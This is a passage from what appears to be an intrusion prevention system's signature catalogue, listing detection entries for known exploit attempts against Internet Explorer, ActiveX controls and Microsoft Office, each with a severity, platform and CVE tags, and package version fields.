Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-386-4219
Vulnerability: Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-10, CVE2008, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-379-4219
Vulnerability: Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-04, CVE2009, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-246-3038
Last changed: sgpkg-ips-246-3038
Vulnerability: Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2009-07, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-234-3038
Vulnerability: Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Memory-Corruption-CVE-2010-0244

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-01, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-279-4219
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-0244
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-MSHTML-CSS-Buffer-Overflow

About this situation: Malicious CSS file detected, possible system compromise
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Internet Explorer 6.0, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-404-4219
Vulnerability: Internet-Explorer-MSHTML-CSS-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability

About this situation: An attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer was detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, MS2008-11, CVE2007, Windows not specific, Internet Explorer not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-188-2032
Vulnerability: Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-386-4219
Vulnerability: Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Object-Reference-Counting-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-12, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-134-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Internet-Explorer-Object-Reference-Counting-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Object-Tag-Slash-Buffer-Overflow

About this situation: Buffer overflow in Internet Explorer allows remote compromise
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, MS2003, CVE2003, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-265-3038
Vulnerability: Ie-Object-Type-Property-BOF
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-03, CVE2010, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-298-4219
Last changed: sgpkg-ips-354-4219
Vulnerability: Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free-CVE-2010-0491
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2008-08, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-191-2032
Last changed: sgpkg-ips-191-2032
Vulnerability: Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, MS2011-08, CVE2011, Windows not specific, Internet Explorer not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-406-4219
Vulnerability: Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Redirect-Memory-Corruption

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, Internet Explorer 9.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-400-4219
Last changed: sgpkg-ips-400-4219
Vulnerability: Microsoft-Internet-Explorer-Redirect-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Remote-Code-Execution-CVE-2009-3762

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, CVE2009, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-268-3038
Last changed: sgpkg-ips-268-3038
Vulnerability: Microsoft-Internet-Explorer-Remote-Code-Execution-CVE-2009-3762
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Internet Explorer
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Internet Explorer, MS2006-10, CVE2006, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-81-1314
Last changed: sgpkg-ips-249-3038
Vulnerability: HTTP-Microsoft-Internet-Explorer-SetSlice-Method-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Speech API detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, MS2007-06, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: Microsoft-Internet-Explorer-Speech-Control-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Style-Object-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2009-12, CVE2009, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Internet-Explorer-Style-Object-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, MS2011-08, CVE2011, Windows not specific, Internet Explorer not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-406-4219
Vulnerability: Microsoft-Internet-Explorer-Telnet-Handler-Code-Execution-CVE-2011-1257
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption

About this situation: Detected an attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-08, CVE2008, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-162-2032
Vulnerability: Microsoft-Internet-Explorer-Textrange-Object-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Internet-Explorer-Time-Element-CVE-2011-1255
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Time-Element-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer, MS2011-06, CVE2011, Any Operating System not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Microsoft-Internet-Explorer-Time-Element-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting

About this situation: An attempt to exploit a cross site scripting vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-06, CVE2010, Windows not specific, Internet Explorer not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-327-4219
Last changed: sgpkg-ips-327-4219
Vulnerability: Microsoft-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Internet-Explorer-toStaticHTML-Disclosure-CVE-2011-1252
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2009-07, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-234-3038
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2530

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2009-10, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-257-3038
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2009-2530
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2009-2531

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2009-10, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-257-3038
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2009-2531
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2010-3328

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-346-4219
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3328
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass

About this situation: An attempt to exploit a security bypass vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2010-06, CVE2010, Windows not specific, Internet Explorer not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-287-4219
Last changed: sgpkg-ips-287-4219
Vulnerability: Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Url-Validation

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-02, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-358-4219
Vulnerability: Microsoft-Internet-Explorer-Url-Validation
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation

About this situation: Detected an obfuscated script
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, CVE2006, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-356-4219
Vulnerability: Microsoft-Internet-Explorer-US-Ascii-Most-Significant-Bit-Obfuscation
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-354-4219
Last changed: sgpkg-ips-354-4219
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962-2

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-393-4219
Vulnerability: Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-3962
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Internet Explorer
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Internet Explorer, MS2006-09, CVE2006, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method

About this situation: Attempt to exploit a buffer overflow vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, MS2008-12, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-195-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method
Description:
Back to top

HTTP_SS-Microsoft-JScript-Scripting-Engine-Remote-Code-Execution

About this situation: An exploit against a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows 2003, Windows 2000 SP4, Windows XP SP2, Windows XP 64-bit SP2, Windows Vista SP1, Windows 2008, Any Hardware, MS2009-09, CVE2009, Windows 2003 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-242-3038
Last changed: sgpkg-ips-242-3038
Vulnerability: Microsoft-JScript-Scripting-Engine-Remote-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object

About this situation: An attempt to use disabled ActiveX object was detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, MS2008-12, MS2009-08, MS2009-10, CVE2008, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-248-3038
Last changed: sgpkg-ips-248-3038
Vulnerability: Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044
Microsoft-Killbit-Disabled-ActiveX-Object
Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution
Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow
Microsoft-Killbit-Disables-ActiveX-Object-CVE-2009-2493
Description:
Back to top

HTTP_SS-Microsoft-Local-Troubleshooter-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to access vulnerabile ActiveX component
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, ActiveX, MS2003, CVE2003, Windows not specific, ActiveX not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Microsoft-Troubleshooter-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879

About this situation: A malicious AVI file targeting CVE-2010-1879 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2010-06, CVE2010, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-310-4219
Last changed: sgpkg-ips-310-4219
Vulnerability: Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
Description:
Back to top

HTTP_SS-Microsoft-Office-Access-ActiveX-Control-Memory-Corruption-CVE-2010-0814

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Office Access ActiveX Control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-07, CVE2010, Windows not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-321-4219
Vulnerability: Microsoft-Office-Access-ActiveX-Control-Memory-Corruption-CVE-2010-0814
Description:
Back to top

HTTP_SS-Microsoft-Office-Art-Drawing-Records-CVE-2010-3334

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2004, Microsoft Office 2007, Microsoft Office 2008, MS2010-11, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-353-4219
Vulnerability: Microsoft-Office-Art-Drawing-Records-CVE-2010-3334
Description:
Back to top

HTTP_SS-Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2004, Microsoft Office 2007, Microsoft Office 2008, Microsoft Office 2010, MS2010-11, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-393-4219
Vulnerability: Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, MS2010-06, CVE2010, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office Excel detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Open XML File Format Converter, MS2009-06, CVE2009, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-395-4219
Vulnerability: Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: HTTP Server Stream
Severity: 7
